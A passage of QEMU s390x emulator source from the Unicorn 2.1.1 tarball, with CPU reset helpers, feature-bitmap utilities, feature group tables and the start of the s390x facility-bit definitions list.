(storage errors, subclasses and subclass modifiers) */ mcic = MCIC_VB_WP | MCIC_VB_MS | MCIC_VB_PM | MCIC_VB_IA | MCIC_VB_FP | MCIC_VB_GR | MCIC_VB_CR | MCIC_VB_ST | MCIC_VB_AR | MCIC_VB_PR | MCIC_VB_FC | MCIC_VB_CT | MCIC_VB_CC; if (s390_has_feat(uc, S390_FEAT_VECTOR)) { mcic |= MCIC_VB_VR; } if (s390_has_feat(uc, S390_FEAT_GUARDED_STORAGE)) { mcic |= MCIC_VB_GS; } return mcic; } static inline void s390_do_cpu_full_reset(CPUState *cs, run_on_cpu_data arg) { cpu_reset(cs); } static inline void s390_do_cpu_reset(CPUState *cs, run_on_cpu_data arg) { S390CPUClass *scc = S390_CPU_GET_CLASS(cs); scc->reset(cs, S390_CPU_RESET_NORMAL); } static inline void s390_do_cpu_initial_reset(CPUState *cs, run_on_cpu_data arg) { S390CPUClass *scc = S390_CPU_GET_CLASS(cs); scc->reset(cs, S390_CPU_RESET_INITIAL); } static inline void s390_do_cpu_load_normal(CPUState *cs, run_on_cpu_data arg) { S390CPUClass *scc = S390_CPU_GET_CLASS(cs); scc->load_normal(cs); } /* cpu.c */ void s390_crypto_reset(void); int s390_set_memory_limit(uint64_t new_limit, uint64_t *hw_limit); void s390_set_max_pagesize(uint64_t pagesize); void s390_cmma_reset(void); void s390_enable_css_support(S390CPU *cpu); unsigned int s390_cpu_set_state(uint8_t cpu_state, S390CPU *cpu); static inline uint8_t s390_cpu_get_state(S390CPU *cpu) { return cpu->env.cpu_state; } /* cpu_models.c */ void s390_cpu_list(void); #define cpu_list s390_cpu_list void s390_set_qemu_cpu_model(uint16_t type, uint8_t gen, uint8_t ec_ga, const S390FeatInit feat_init); /* helper.c */ #define S390_CPU_TYPE_SUFFIX "-" TYPE_S390_CPU #define S390_CPU_TYPE_NAME(name) (name S390_CPU_TYPE_SUFFIX) #define CPU_RESOLVING_TYPE TYPE_S390_CPU /* you can call this signal handler from your SIGBUS and SIGSEGV signal handlers to inform the virtual CPU of exceptions. non zero is returned if the signal was handled by the virtual CPU. 
*/
int cpu_s390x_signal_handler(int host_signum, void *pinfo, void *puc);
#define cpu_signal_handler cpu_s390x_signal_handler

/* interrupt.c */
void s390_crw_mchk(void);
void s390_io_interrupt(uint16_t subchannel_id, uint16_t subchannel_nr,
                       uint32_t io_int_parm, uint32_t io_int_word);
#define RA_IGNORED 0
void s390_program_interrupt(CPUS390XState *env, uint32_t code, uintptr_t ra);
/* service interrupts are floating, therefore we must not pass a cpustate */
void s390_sclp_extint(uint32_t parm);

/* mmu_helper.c */
int s390_cpu_virt_mem_rw(S390CPU *cpu, vaddr laddr, uint8_t ar, void *hostbuf,
                         int len, bool is_write);
#define s390_cpu_virt_mem_read(cpu, laddr, ar, dest, len) \
        s390_cpu_virt_mem_rw(cpu, laddr, ar, dest, len, false)
#define s390_cpu_virt_mem_write(cpu, laddr, ar, dest, len) \
        s390_cpu_virt_mem_rw(cpu, laddr, ar, dest, len, true)
#define s390_cpu_virt_mem_check_read(cpu, laddr, ar, len) \
        s390_cpu_virt_mem_rw(cpu, laddr, ar, NULL, len, false)
#define s390_cpu_virt_mem_check_write(cpu, laddr, ar, len) \
        s390_cpu_virt_mem_rw(cpu, laddr, ar, NULL, len, true)
void s390_cpu_virt_mem_handle_exc(S390CPU *cpu, uintptr_t ra);

/* sigp.c */
int s390_cpu_restart(S390CPU *cpu);
void s390_init_sigp(void);

/* outside of target/s390x/ */
S390CPU *s390_cpu_addr2state(uint16_t cpu_addr);

typedef CPUS390XState CPUArchState;
typedef S390CPU ArchCPU;

#include "exec/cpu-all.h"

typedef enum CpuS390State {
    S390_CPU_STATE_UNINITIALIZED,
    S390_CPU_STATE_STOPPED,
    S390_CPU_STATE_CHECK_STOP,
    S390_CPU_STATE_OPERATING,
    S390_CPU_STATE_LOAD,
    S390_CPU_STATE__MAX,
} CpuS390State;

#endif

unicorn-2.1.1/qemu/target/s390x/cpu_features.c

/*
 * CPU features/facilities for s390x
 *
 * Copyright IBM Corp. 2016, 2018
 * Copyright Red Hat, Inc. 2019
 *
 * Author(s): David Hildenbrand <david@redhat.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or (at
 * your option) any later version. See the COPYING file in the top-level
 * directory.
*/ #include "qemu/osdep.h" #include "cpu_features.h" #define DEF_FEAT(_FEAT, _NAME, _TYPE, _BIT, _DESC) \ [S390_FEAT_##_FEAT] = { \ .name = _NAME, \ .type = S390_FEAT_TYPE_##_TYPE, \ .bit = _BIT, \ .desc = _DESC, \ }, static const S390FeatDef s390_features[S390_FEAT_MAX] = { #include "cpu_features_def.inc.h" }; #undef DEF_FEAT const S390FeatDef *s390_feat_def(S390Feat feat) { return &s390_features[feat]; } S390Feat s390_feat_by_type_and_bit(S390FeatType type, int bit) { S390Feat feat; for (feat = 0; feat < ARRAY_SIZE(s390_features); feat++) { if (s390_features[feat].type == type && s390_features[feat].bit == bit) { return feat; } } return S390_FEAT_MAX; } void s390_init_feat_bitmap(const S390FeatInit init, S390FeatBitmap bitmap) { int i, j; for (i = 0; i < (S390_FEAT_MAX / 64 + 1); i++) { if (init[i]) { for (j = 0; j < 64; j++) { if (init[i] & 1ULL << j) { set_bit(i * 64 + j, bitmap); } } } } } void s390_fill_feat_block(const S390FeatBitmap features, S390FeatType type, uint8_t *data) { S390Feat feat; int bit_nr; switch (type) { case S390_FEAT_TYPE_STFL: if (test_bit(S390_FEAT_ZARCH, features)) { /* Features that are always active */ set_be_bit(2, data); /* z/Architecture */ set_be_bit(138, data); /* Configuration-z-architectural-mode */ } break; case S390_FEAT_TYPE_PTFF: case S390_FEAT_TYPE_KMAC: case S390_FEAT_TYPE_KMC: case S390_FEAT_TYPE_KM: case S390_FEAT_TYPE_KIMD: case S390_FEAT_TYPE_KLMD: case S390_FEAT_TYPE_PCKMO: case S390_FEAT_TYPE_KMCTR: case S390_FEAT_TYPE_KMF: case S390_FEAT_TYPE_KMO: case S390_FEAT_TYPE_PCC: case S390_FEAT_TYPE_PPNO: case S390_FEAT_TYPE_KMA: case S390_FEAT_TYPE_KDSA: case S390_FEAT_TYPE_SORTL: case S390_FEAT_TYPE_DFLTCC: set_be_bit(0, data); /* query is always available */ break; default: break; }; feat = find_first_bit(features, S390_FEAT_MAX); while (feat < S390_FEAT_MAX) { if (s390_features[feat].type == type) { bit_nr = s390_features[feat].bit; /* big endian on uint8_t array */ set_be_bit(bit_nr, data); } feat = find_next_bit(features, S390_FEAT_MAX, feat + 1); } } void s390_add_from_feat_block(S390FeatBitmap features, S390FeatType type, uint8_t *data) { int nr_bits, le_bit; switch (type) { case S390_FEAT_TYPE_STFL: nr_bits = 16384; break; case S390_FEAT_TYPE_PLO: case S390_FEAT_TYPE_SORTL: case S390_FEAT_TYPE_DFLTCC: nr_bits = 256; break; default: /* all cpu subfunctions have 128 bit */ nr_bits = 128; }; le_bit = find_first_bit((unsigned long *) data, nr_bits); while (le_bit < nr_bits) { /* convert the bit number to a big endian bit nr */ S390Feat feat = s390_feat_by_type_and_bit(type, BE_BIT_NR(le_bit)); /* ignore unknown bits */ if (feat < S390_FEAT_MAX) { set_bit(feat, features); } le_bit = find_next_bit((unsigned long *) data, nr_bits, le_bit + 1); } } void s390_feat_bitmap_to_ascii(const S390FeatBitmap features, void *opaque, void (*fn)(const char *name, void *opaque)) { S390FeatBitmap bitmap, tmp; S390FeatGroup group; S390Feat feat; bitmap_copy(bitmap, features, S390_FEAT_MAX); /* process whole groups first */ for (group = 0; group < S390_FEAT_GROUP_MAX; group++) { const S390FeatGroupDef *def = s390_feat_group_def(group); bitmap_and(tmp, bitmap, def->feat, S390_FEAT_MAX); if (bitmap_equal(tmp, def->feat, S390_FEAT_MAX)) { bitmap_andnot(bitmap, bitmap, def->feat, S390_FEAT_MAX); fn(def->name, opaque); } } /* report leftovers as separate features */ feat = find_first_bit(bitmap, S390_FEAT_MAX); while (feat < S390_FEAT_MAX) { fn(s390_feat_def(feat)->name, opaque); feat = find_next_bit(bitmap, S390_FEAT_MAX, feat + 1); }; } #define 
FEAT_GROUP_INIT(_name, _group, _desc)                        \
    {                                                        \
        .name = _name,                                       \
        .desc = _desc,                                       \
        .init = { S390_FEAT_GROUP_LIST_ ## _group },         \
    }

/* indexed by feature group number for easy lookup */
static S390FeatGroupDef s390_feature_groups[] = {
    FEAT_GROUP_INIT("plo", PLO, "Perform-locked-operation facility"),
    FEAT_GROUP_INIT("tods", TOD_CLOCK_STEERING, "Tod-clock-steering facility"),
    FEAT_GROUP_INIT("gen13ptff", GEN13_PTFF, "PTFF enhancements introduced with z13"),
    FEAT_GROUP_INIT("msa", MSA, "Message-security-assist facility"),
    FEAT_GROUP_INIT("msa1", MSA_EXT_1, "Message-security-assist-extension 1 facility"),
    FEAT_GROUP_INIT("msa2", MSA_EXT_2, "Message-security-assist-extension 2 facility"),
    FEAT_GROUP_INIT("msa3", MSA_EXT_3, "Message-security-assist-extension 3 facility"),
    FEAT_GROUP_INIT("msa4", MSA_EXT_4, "Message-security-assist-extension 4 facility"),
    FEAT_GROUP_INIT("msa5", MSA_EXT_5, "Message-security-assist-extension 5 facility"),
    FEAT_GROUP_INIT("msa6", MSA_EXT_6, "Message-security-assist-extension 6 facility"),
    FEAT_GROUP_INIT("msa7", MSA_EXT_7, "Message-security-assist-extension 7 facility"),
    FEAT_GROUP_INIT("msa8", MSA_EXT_8, "Message-security-assist-extension 8 facility"),
    FEAT_GROUP_INIT("msa9", MSA_EXT_9, "Message-security-assist-extension 9 facility"),
    FEAT_GROUP_INIT("msa9_pckmo", MSA_EXT_9_PCKMO, "Message-security-assist-extension 9 PCKMO subfunctions"),
    FEAT_GROUP_INIT("mepochptff", MULTIPLE_EPOCH_PTFF, "PTFF enhancements introduced with Multiple-epoch facility"),
    FEAT_GROUP_INIT("esort", ENH_SORT, "Enhanced-sort facility"),
    FEAT_GROUP_INIT("deflate", DEFLATE_CONVERSION, "Deflate-conversion facility"),
};

const S390FeatGroupDef *s390_feat_group_def(S390FeatGroup group)
{
    return &s390_feature_groups[group];
}

void init_groups(void)
{
    int i;

    /* init all bitmaps from generated data initially */
    for (i = 0; i < ARRAY_SIZE(s390_feature_groups); i++) {
        s390_init_feat_bitmap(s390_feature_groups[i].init,
                              s390_feature_groups[i].feat);
    }
}

unicorn-2.1.1/qemu/target/s390x/cpu_features.h

/*
 * CPU features/facilities helper structs and utility functions for s390
 *
 * Copyright 2016 IBM Corp.
 *
 * Author(s): Michael Mueller <mimu@linux.vnet.ibm.com>
 *            David Hildenbrand <dahi@linux.vnet.ibm.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or (at
 * your option) any later version. See the COPYING file in the top-level
 * directory.
*/ #ifndef TARGET_S390X_CPU_FEATURES_H #define TARGET_S390X_CPU_FEATURES_H #include "qemu/bitmap.h" #include "cpu_features_def.h" #include "gen-features.h" /* CPU features are announced via different ways */ typedef enum { S390_FEAT_TYPE_STFL, S390_FEAT_TYPE_SCLP_CONF_CHAR, S390_FEAT_TYPE_SCLP_CONF_CHAR_EXT, S390_FEAT_TYPE_SCLP_CPU, S390_FEAT_TYPE_MISC, S390_FEAT_TYPE_PLO, S390_FEAT_TYPE_PTFF, S390_FEAT_TYPE_KMAC, S390_FEAT_TYPE_KMC, S390_FEAT_TYPE_KM, S390_FEAT_TYPE_KIMD, S390_FEAT_TYPE_KLMD, S390_FEAT_TYPE_PCKMO, S390_FEAT_TYPE_KMCTR, S390_FEAT_TYPE_KMF, S390_FEAT_TYPE_KMO, S390_FEAT_TYPE_PCC, S390_FEAT_TYPE_PPNO, S390_FEAT_TYPE_KMA, S390_FEAT_TYPE_KDSA, S390_FEAT_TYPE_SORTL, S390_FEAT_TYPE_DFLTCC, } S390FeatType; /* Definition of a CPU feature */ typedef struct { const char *name; /* name exposed to the user */ const char *desc; /* description exposed to the user */ S390FeatType type; /* feature type (way of indication)*/ int bit; /* bit within the feature type area (fixed) */ } S390FeatDef; /* use ordinary bitmap operations to work with features */ typedef unsigned long S390FeatBitmap[BITS_TO_LONGS(S390_FEAT_MAX)]; /* 64bit based bitmap used to init S390FeatBitmap from generated data */ typedef uint64_t S390FeatInit[S390_FEAT_MAX / 64 + 1]; const S390FeatDef *s390_feat_def(S390Feat feat); S390Feat s390_feat_by_type_and_bit(S390FeatType type, int bit); void s390_init_feat_bitmap(const S390FeatInit init, S390FeatBitmap bitmap); void s390_fill_feat_block(const S390FeatBitmap features, S390FeatType type, uint8_t *data); void s390_add_from_feat_block(S390FeatBitmap features, S390FeatType type, uint8_t *data); void s390_feat_bitmap_to_ascii(const S390FeatBitmap features, void *opaque, void (*fn)(const char *name, void *opaque)); /* Definition of a CPU feature group */ typedef struct { const char *name; /* name exposed to the user */ const char *desc; /* description exposed to the user */ S390FeatBitmap feat; /* features contained in the group */ S390FeatInit init; /* used to init feat from generated data */ } S390FeatGroupDef; const S390FeatGroupDef *s390_feat_group_def(S390FeatGroup group); #define BE_BIT_NR(BIT) (BIT ^ (BITS_PER_LONG - 1)) static inline void set_be_bit(unsigned int bit_nr, uint8_t *array) { array[bit_nr / 8] |= 0x80 >> (bit_nr % 8); } static inline bool test_be_bit(unsigned int bit_nr, const uint8_t *array) { return array[bit_nr / 8] & (0x80 >> (bit_nr % 8)); } #endif /* TARGET_S390X_CPU_FEATURES_H */ ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu_features_def.h��������������������������������������������������0000664�0000000�0000000�00000001226�14675241067�0022004�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * CPU features/facilities for s390 * * Copyright IBM Corp. 2016, 2018 * Copyright Red Hat, Inc. 
2019 * * Author(s): Michael Mueller <mimu@linux.vnet.ibm.com> * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ #ifndef TARGET_S390X_CPU_FEATURES_DEF_H #define TARGET_S390X_CPU_FEATURES_DEF_H #define DEF_FEAT(_FEAT, ...) S390_FEAT_##_FEAT, typedef enum { #include "cpu_features_def.inc.h" S390_FEAT_MAX, } S390Feat; #undef DEF_FEAT #endif /* TARGET_S390X_CPU_FEATURES_DEF_H */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu_features_def.inc.h����������������������������������������������0000664�0000000�0000000�00000064140�14675241067�0022560�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RAW s390x CPU feature definitions: * * DEF_FEAT(_FEAT, _NAME, _TYPE, _BIT, _DESC): * - _FEAT: Feature (enum) name used internally (S390_FEAT_##_FEAT) * - _NAME: Feature name exposed to the user. * - _TYPE: Feature type (S390_FEAT_TYPE_##_TYPE). * - _BIT: Feature bit number within feature type block (unused for MISC). * - _DESC: Feature description, exposed to the user. * * Copyright IBM Corp. 2016, 2018 * Copyright Red Hat, Inc. 2019 * * Author(s): Michael Mueller <mimu@linux.vnet.ibm.com> * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ /* Features exposed via the STFL(E) instruction. 
*/ DEF_FEAT(ESAN3, "esan3", STFL, 0, "Instructions marked as n3") DEF_FEAT(ZARCH, "zarch", STFL, 1, "z/Architecture architectural mode") DEF_FEAT(DAT_ENH, "dateh", STFL, 3, "DAT-enhancement facility") DEF_FEAT(IDTE_SEGMENT, "idtes", STFL, 4, "IDTE selective TLB segment-table clearing") DEF_FEAT(IDTE_REGION, "idter", STFL, 5, "IDTE selective TLB region-table clearing") DEF_FEAT(ASN_LX_REUSE, "asnlxr", STFL, 6, "ASN-and-LX reuse facility") DEF_FEAT(STFLE, "stfle", STFL, 7, "Store-facility-list-extended facility") DEF_FEAT(EDAT, "edat", STFL, 8, "Enhanced-DAT facility") DEF_FEAT(SENSE_RUNNING_STATUS, "srs", STFL, 9, "Sense-running-status facility") DEF_FEAT(CONDITIONAL_SSKE, "csske", STFL, 10, "Conditional-SSKE facility") DEF_FEAT(CONFIGURATION_TOPOLOGY, "ctop", STFL, 11, "Configuration-topology facility") DEF_FEAT(AP_QUERY_CONFIG_INFO, "apqci", STFL, 12, "Query AP Configuration Information facility") DEF_FEAT(IPTE_RANGE, "ipter", STFL, 13, "IPTE-range facility") DEF_FEAT(NONQ_KEY_SETTING, "nonqks", STFL, 14, "Nonquiescing key-setting facility") DEF_FEAT(AP_FACILITIES_TEST, "apft", STFL, 15, "AP Facilities Test facility") DEF_FEAT(EXTENDED_TRANSLATION_2, "etf2", STFL, 16, "Extended-translation facility 2") DEF_FEAT(MSA, "msa-base", STFL, 17, "Message-security-assist facility (excluding subfunctions)") DEF_FEAT(LONG_DISPLACEMENT, "ldisp", STFL, 18, "Long-displacement facility") DEF_FEAT(LONG_DISPLACEMENT_FAST, "ldisphp", STFL, 19, "Long-displacement facility has high performance") DEF_FEAT(HFP_MADDSUB, "hfpm", STFL, 20, "HFP-multiply-add/subtract facility") DEF_FEAT(EXTENDED_IMMEDIATE, "eimm", STFL, 21, "Extended-immediate facility") DEF_FEAT(EXTENDED_TRANSLATION_3, "etf3", STFL, 22, "Extended-translation facility 3") DEF_FEAT(HFP_UNNORMALIZED_EXT, "hfpue", STFL, 23, "HFP-unnormalized-extension facility") DEF_FEAT(ETF2_ENH, "etf2eh", STFL, 24, "ETF2-enhancement facility") DEF_FEAT(STORE_CLOCK_FAST, "stckf", STFL, 25, "Store-clock-fast facility") DEF_FEAT(PARSING_ENH, "parseh", STFL, 26, "Parsing-enhancement facility") DEF_FEAT(MOVE_WITH_OPTIONAL_SPEC, "mvcos", STFL, 27, "Move-with-optional-specification facility") DEF_FEAT(TOD_CLOCK_STEERING, "tods-base", STFL, 28, "TOD-clock-steering facility (excluding subfunctions)") DEF_FEAT(ETF3_ENH, "etf3eh", STFL, 30, "ETF3-enhancement facility") DEF_FEAT(EXTRACT_CPU_TIME, "ectg", STFL, 31, "Extract-CPU-time facility") DEF_FEAT(COMPARE_AND_SWAP_AND_STORE, "csst", STFL, 32, "Compare-and-swap-and-store facility") DEF_FEAT(COMPARE_AND_SWAP_AND_STORE_2, "csst2", STFL, 33, "Compare-and-swap-and-store facility 2") DEF_FEAT(GENERAL_INSTRUCTIONS_EXT, "ginste", STFL, 34, "General-instructions-extension facility") DEF_FEAT(EXECUTE_EXT, "exrl", STFL, 35, "Execute-extensions facility") DEF_FEAT(ENHANCED_MONITOR, "emon", STFL, 36, "Enhanced-monitor facility") DEF_FEAT(FLOATING_POINT_EXT, "fpe", STFL, 37, "Floating-point extension facility") DEF_FEAT(ORDER_PRESERVING_COMPRESSION, "opc", STFL, 38, "Order Preserving Compression facility") DEF_FEAT(SET_PROGRAM_PARAMETERS, "sprogp", STFL, 40, "Set-program-parameters facility") DEF_FEAT(FLOATING_POINT_SUPPPORT_ENH, "fpseh", STFL, 41, "Floating-point-support-enhancement facilities") DEF_FEAT(DFP, "dfp", STFL, 42, "DFP (decimal-floating-point) facility") DEF_FEAT(DFP_FAST, "dfphp", STFL, 43, "DFP (decimal-floating-point) facility has high performance") DEF_FEAT(PFPO, "pfpo", STFL, 44, "PFPO instruction") DEF_FEAT(STFLE_45, "stfle45", STFL, 45, "Various facilities introduced with z196") DEF_FEAT(CMPSC_ENH, "cmpsceh", STFL, 
47, "CMPSC-enhancement facility") DEF_FEAT(DFP_ZONED_CONVERSION, "dfpzc", STFL, 48, "Decimal-floating-point zoned-conversion facility") DEF_FEAT(STFLE_49, "stfle49", STFL, 49, "Various facilities introduced with zEC12") DEF_FEAT(CONSTRAINT_TRANSACTIONAL_EXE, "cte", STFL, 50, "Constrained transactional-execution facility") DEF_FEAT(LOCAL_TLB_CLEARING, "ltlbc", STFL, 51, "Local-TLB-clearing facility") DEF_FEAT(INTERLOCKED_ACCESS_2, "iacc2", STFL, 52, "Interlocked-access facility 2") DEF_FEAT(STFLE_53, "stfle53", STFL, 53, "Various facilities introduced with z13") DEF_FEAT(ENTROPY_ENC_COMP, "eec", STFL, 54, "Entropy encoding compression facility") DEF_FEAT(MSA_EXT_5, "msa5-base", STFL, 57, "Message-security-assist-extension-5 facility (excluding subfunctions)") DEF_FEAT(MISC_INSTRUCTION_EXT, "minste2", STFL, 58, "Miscellaneous-instruction-extensions facility 2") DEF_FEAT(SEMAPHORE_ASSIST, "sema", STFL, 59, "Semaphore-assist facility") DEF_FEAT(TIME_SLICE_INSTRUMENTATION, "tsi", STFL, 60, "Time-slice Instrumentation facility") DEF_FEAT(MISC_INSTRUCTION_EXT3, "minste3", STFL, 61, "Miscellaneous-Instruction-Extensions Facility 3") DEF_FEAT(RUNTIME_INSTRUMENTATION, "ri", STFL, 64, "CPU runtime-instrumentation facility") DEF_FEAT(AP_QUEUE_INTERRUPT_CONTROL, "apqi", STFL, 65, "AP-Queue interruption facility") DEF_FEAT(ZPCI, "zpci", STFL, 69, "z/PCI facility") DEF_FEAT(ADAPTER_EVENT_NOTIFICATION, "aen", STFL, 71, "General-purpose-adapter-event-notification facility") DEF_FEAT(ADAPTER_INT_SUPPRESSION, "ais", STFL, 72, "General-purpose-adapter-interruption-suppression facility") DEF_FEAT(TRANSACTIONAL_EXE, "te", STFL, 73, "Transactional-execution facility") DEF_FEAT(STORE_HYPERVISOR_INFO, "sthyi", STFL, 74, "Store-hypervisor-information facility") DEF_FEAT(ACCESS_EXCEPTION_FS_INDICATION, "aefsi", STFL, 75, "Access-exception-fetch/store-indication facility") DEF_FEAT(MSA_EXT_3, "msa3-base", STFL, 76, "Message-security-assist-extension-3 facility (excluding subfunctions)") DEF_FEAT(MSA_EXT_4, "msa4-base", STFL, 77, "Message-security-assist-extension-4 facility (excluding subfunctions)") DEF_FEAT(EDAT_2, "edat2", STFL, 78, "Enhanced-DAT facility 2") DEF_FEAT(DFP_PACKED_CONVERSION, "dfppc", STFL, 80, "Decimal-floating-point packed-conversion facility") DEF_FEAT(PPA15, "ppa15", STFL, 81, "PPA15 is installed") DEF_FEAT(BPB, "bpb", STFL, 82, "Branch prediction blocking") DEF_FEAT(VECTOR, "vx", STFL, 129, "Vector facility") DEF_FEAT(INSTRUCTION_EXEC_PROT, "iep", STFL, 130, "Instruction-execution-protection facility") DEF_FEAT(SIDE_EFFECT_ACCESS_ESOP2, "sea_esop2", STFL, 131, "Side-effect-access facility and Enhanced-suppression-on-protection facility 2") DEF_FEAT(GUARDED_STORAGE, "gs", STFL, 133, "Guarded-storage facility") DEF_FEAT(VECTOR_PACKED_DECIMAL, "vxpd", STFL, 134, "Vector packed decimal facility") DEF_FEAT(VECTOR_ENH, "vxeh", STFL, 135, "Vector enhancements facility") DEF_FEAT(MULTIPLE_EPOCH, "mepoch", STFL, 139, "Multiple-epoch facility") DEF_FEAT(TEST_PENDING_EXT_INTERRUPTION, "tpei", STFL, 144, "Test-pending-external-interruption facility") DEF_FEAT(INSERT_REFERENCE_BITS_MULT, "irbm", STFL, 145, "Insert-reference-bits-multiple facility") DEF_FEAT(MSA_EXT_8, "msa8-base", STFL, 146, "Message-security-assist-extension-8 facility (excluding subfunctions)") DEF_FEAT(CMM_NT, "cmmnt", STFL, 147, "CMM: ESSA-enhancement (no translate) facility") DEF_FEAT(VECTOR_ENH2, "vxeh2", STFL, 148, "Vector Enhancements facility 2") DEF_FEAT(ESORT_BASE, "esort-base", STFL, 150, "Enhanced-sort facility (excluding 
subfunctions)") DEF_FEAT(DEFLATE_BASE, "deflate-base", STFL, 151, "Deflate-conversion facility (excluding subfunctions)") DEF_FEAT(VECTOR_PACKED_DECIMAL_ENH, "vxpdeh", STFL, 152, "Vector-Packed-Decimal-Enhancement Facility") DEF_FEAT(MSA_EXT_9, "msa9-base", STFL, 155, "Message-security-assist-extension-9 facility (excluding subfunctions)") DEF_FEAT(ETOKEN, "etoken", STFL, 156, "Etoken facility") /* Features exposed via SCLP SCCB Byte 80 - 98 (bit numbers relative to byte-80) */ DEF_FEAT(SIE_GSLS, "gsls", SCLP_CONF_CHAR, 40, "SIE: Guest-storage-limit-suppression facility") DEF_FEAT(ESOP, "esop", SCLP_CONF_CHAR, 46, "Enhanced-suppression-on-protection facility") DEF_FEAT(HPMA2, "hpma2", SCLP_CONF_CHAR, 90, "Host page management assist 2 Facility") /* 91-2 */ DEF_FEAT(SIE_KSS, "kss", SCLP_CONF_CHAR, 151, "SIE: Keyless-subset facility") /* 98-7 */ /* Features exposed via SCLP SCCB Byte 116 - 119 (bit numbers relative to byte-116) */ DEF_FEAT(SIE_64BSCAO, "64bscao", SCLP_CONF_CHAR_EXT, 0, "SIE: 64-bit-SCAO facility") DEF_FEAT(SIE_CMMA, "cmma", SCLP_CONF_CHAR_EXT, 1, "SIE: Collaborative-memory-management assist") DEF_FEAT(SIE_PFMFI, "pfmfi", SCLP_CONF_CHAR_EXT, 9, "SIE: PFMF interpretation facility") DEF_FEAT(SIE_IBS, "ibs", SCLP_CONF_CHAR_EXT, 10, "SIE: Interlock-and-broadcast-suppression facility") /* Features exposed via SCLP CPU info. */ DEF_FEAT(SIE_F2, "sief2", SCLP_CPU, 4, "SIE: interception format 2 (Virtual SIE)") DEF_FEAT(SIE_SKEY, "skey", SCLP_CPU, 5, "SIE: Storage-key facility") DEF_FEAT(SIE_GPERE, "gpereh", SCLP_CPU, 10, "SIE: Guest-PER enhancement facility") DEF_FEAT(SIE_SIIF, "siif", SCLP_CPU, 11, "SIE: Shared IPTE-interlock facility") DEF_FEAT(SIE_SIGPIF, "sigpif", SCLP_CPU, 12, "SIE: SIGP interpretation facility") DEF_FEAT(SIE_IB, "ib", SCLP_CPU, 42, "SIE: Intervention bypass facility") DEF_FEAT(SIE_CEI, "cei", SCLP_CPU, 43, "SIE: Conditional-external-interception facility") /* * Features exposed via no feature bit (but e.g., instruction sensing) * -> the feature bit number is irrelavant */ DEF_FEAT(DAT_ENH_2, "dateh2", MISC, 0, "DAT-enhancement facility 2") DEF_FEAT(CMM, "cmm", MISC, 0, "Collaborative-memory-management facility") DEF_FEAT(AP, "ap", MISC, 0, "AP instructions installed") /* Features exposed via the PLO instruction. 
*/ DEF_FEAT(PLO_CL, "plo-cl", PLO, 0, "PLO Compare and load (32 bit in general registers)") DEF_FEAT(PLO_CLG, "plo-clg", PLO, 1, "PLO Compare and load (64 bit in parameter list)") DEF_FEAT(PLO_CLGR, "plo-clgr", PLO, 2, "PLO Compare and load (32 bit in general registers)") DEF_FEAT(PLO_CLX, "plo-clx", PLO, 3, "PLO Compare and load (128 bit in parameter list)") DEF_FEAT(PLO_CS, "plo-cs", PLO, 4, "PLO Compare and swap (32 bit in general registers)") DEF_FEAT(PLO_CSG, "plo-csg", PLO, 5, "PLO Compare and swap (64 bit in parameter list)") DEF_FEAT(PLO_CSGR, "plo-csgr", PLO, 6, "PLO Compare and swap (32 bit in general registers)") DEF_FEAT(PLO_CSX, "plo-csx", PLO, 7, "PLO Compare and swap (128 bit in parameter list)") DEF_FEAT(PLO_DCS, "plo-dcs", PLO, 8, "PLO Double compare and swap (32 bit in general registers)") DEF_FEAT(PLO_DCSG, "plo-dcsg", PLO, 9, "PLO Double compare and swap (64 bit in parameter list)") DEF_FEAT(PLO_DCSGR, "plo-dcsgr", PLO, 10, "PLO Double compare and swap (32 bit in general registers)") DEF_FEAT(PLO_DCSX, "plo-dcsx", PLO, 11, "PLO Double compare and swap (128 bit in parameter list)") DEF_FEAT(PLO_CSST, "plo-csst", PLO, 12, "PLO Compare and swap and store (32 bit in general registers)") DEF_FEAT(PLO_CSSTG, "plo-csstg", PLO, 13, "PLO Compare and swap and store (64 bit in parameter list)") DEF_FEAT(PLO_CSSTGR, "plo-csstgr", PLO, 14, "PLO Compare and swap and store (32 bit in general registers)") DEF_FEAT(PLO_CSSTX, "plo-csstx", PLO, 15, "PLO Compare and swap and store (128 bit in parameter list)") DEF_FEAT(PLO_CSDST, "plo-csdst", PLO, 16, "PLO Compare and swap and double store (32 bit in general registers)") DEF_FEAT(PLO_CSDSTG, "plo-csdstg", PLO, 17, "PLO Compare and swap and double store (64 bit in parameter list)") DEF_FEAT(PLO_CSDSTGR, "plo-csdstgr", PLO, 18, "PLO Compare and swap and double store (32 bit in general registers)") DEF_FEAT(PLO_CSDSTX, "plo-csdstx", PLO, 19, "PLO Compare and swap and double store (128 bit in parameter list)") DEF_FEAT(PLO_CSTST, "plo-cstst", PLO, 20, "PLO Compare and swap and triple store (32 bit in general registers)") DEF_FEAT(PLO_CSTSTG, "plo-cststg", PLO, 21, "PLO Compare and swap and triple store (64 bit in parameter list)") DEF_FEAT(PLO_CSTSTGR, "plo-cststgr", PLO, 22, "PLO Compare and swap and triple store (32 bit in general registers)") DEF_FEAT(PLO_CSTSTX, "plo-cststx", PLO, 23, "PLO Compare and swap and triple store (128 bit in parameter list)") /* Features exposed via the PTFF instruction. */ DEF_FEAT(PTFF_QTO, "ptff-qto", PTFF, 1, "PTFF Query TOD Offset") DEF_FEAT(PTFF_QSI, "ptff-qsi", PTFF, 2, "PTFF Query Steering Information") DEF_FEAT(PTFF_QPT, "ptff-qpc", PTFF, 3, "PTFF Query Physical Clock") DEF_FEAT(PTFF_QUI, "ptff-qui", PTFF, 4, "PTFF Query UTC Information") DEF_FEAT(PTFF_QTOU, "ptff-qtou", PTFF, 5, "PTFF Query TOD Offset User") 